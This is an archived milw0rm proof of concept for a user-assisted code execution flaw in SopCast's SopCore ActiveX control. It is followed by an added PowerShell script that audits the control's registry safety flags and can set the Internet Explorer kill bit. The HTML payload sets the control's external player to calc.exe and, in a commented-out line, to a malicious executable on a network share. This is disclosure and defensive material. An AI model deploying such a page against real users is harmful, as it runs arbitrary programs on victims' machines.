<!-- Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer()
user assisted remote code execution poc
by Nine:Situations:Group::surfista (IE7/8)

our site: http://retrogod.altervista.org/
software site: http://www.sopcast.org/

Through the SetExternalPlayer() method and the ExternalPlayer property
it is possible to associate an arbitrary executable with the "external player"
button (for clarity see http://www.sopcast.com/docs/ where the player
control buttons are shown), which opens Windows Media Player by default.
When the user clicks this button, the executable is launched without prompts.
This value is also stored in config.xml, inside the sopcast local folder,
for further use, e.g. with the sopcast client application.
Note: this control is safe for scripting and safe for initialization
-->
<HTML>
<HEAD>
<script language="Javascript" type="text/JavaScript">
window.onload=function()
{
SopPlayer.InitPlayer();
//SopPlayer.SetExternalPlayer("\\\\192.168.0.1\\c$\\PATH\\TO\\MALICIOUS_PROGRAM.EXE");
SopPlayer.SetExternalPlayer("c:\\WINDOWS\\system32\\calc.exe");
SopPlayer.SetSopAddress("sop://broker.sopcast.com:3912/6002"); //A LIVE CHANNEL ...
SopPlayer.SetChannelName("CCTV5");
SopPlayer.Play();
}
</script>
</HEAD>
<BODY>
<OBJECT
ID="SopPlayer"
name="SopPlayer"
CLASSID=clsid:8FEFF364-6A5F-4966-A917-A3AC28411659
HEIGHT=375
WIDTH=375>
</OBJECT>
</BODY>
</HTML>

# milw0rm.com [2009-03-03]
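
Added example, not part of the original advisory or of SopCast: a PowerShell audit that reports whether the control with the CLSID used above is registered, whether the registry marks it safe for scripting and initialization (the property the note in the advisory relies on), and whether the Internet Explorer kill bit is set for it. The `-SetKillBit` switch is a name chosen for this script; the registry locations, category IDs and the 0x400 flag are the standard IE/COM ones.

```powershell
# Audit (and optionally block) the SopCore ActiveX control in Internet Explorer.
# The CLSID comes from the PoC's <OBJECT> tag; nothing else here is SopCast-specific.
param([switch]$SetKillBit)   # script-local switch; setting the kill bit needs an elevated prompt

$clsid   = '{8FEFF364-6A5F-4966-A917-A3AC28411659}'
$killBit = 0x400             # "Compatibility Flags" value that stops IE from loading the control
$catids  = [ordered]@{
    SafeForScripting      = '{7DD95801-9882-11CF-9FA9-00AA00A06FFC}'
    SafeForInitialization = '{7DD95802-9882-11CF-9FA9-00AA00A06FFC}'
}
# Native view and the 32-bit (WOW64) view; 32-bit IE on 64-bit Windows reads the second.
$roots = 'HKLM:\SOFTWARE', 'HKLM:\SOFTWARE\WOW6432Node'

foreach ($root in $roots) {
    if (-not (Test-Path $root)) { continue }
    $classKey  = "$root\Classes\CLSID\$clsid"
    $compatKey = "$root\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"

    $report = [ordered]@{ View = $root; Registered = (Test-Path $classKey); Binary = $null }
    $server = Get-Item "$classKey\InprocServer32" -ErrorAction SilentlyContinue
    if ($server) { $report.Binary = $server.GetValue('') }   # path of the .ocx that would load

    # Registry-declared safety categories. A control can also claim safety at run time
    # through IObjectSafety, so False here does not prove the control is unscriptable.
    foreach ($name in $catids.Keys) {
        $report[$name] = Test-Path "$classKey\Implemented Categories\$($catids[$name])"
    }

    $flags = (Get-ItemProperty $compatKey -Name 'Compatibility Flags' `
              -ErrorAction SilentlyContinue).'Compatibility Flags'
    $report.KillBitSet = [bool]($flags -band $killBit)

    if ($SetKillBit -and -not $report.KillBitSet) {
        # Create the key only if missing so existing values under it are preserved.
        if (-not (Test-Path $compatKey)) { New-Item $compatKey -Force | Out-Null }
        Set-ItemProperty $compatKey -Name 'Compatibility Flags' `
            -Value ([int]$flags -bor $killBit) -Type DWord
        $report.KillBitSet = $true
    }
    [pscustomobject]$report
}
```

The kill bit only stops Internet Explorer from instantiating the control; a path already written to config.xml in the SopCast folder is unaffected and should be reviewed separately.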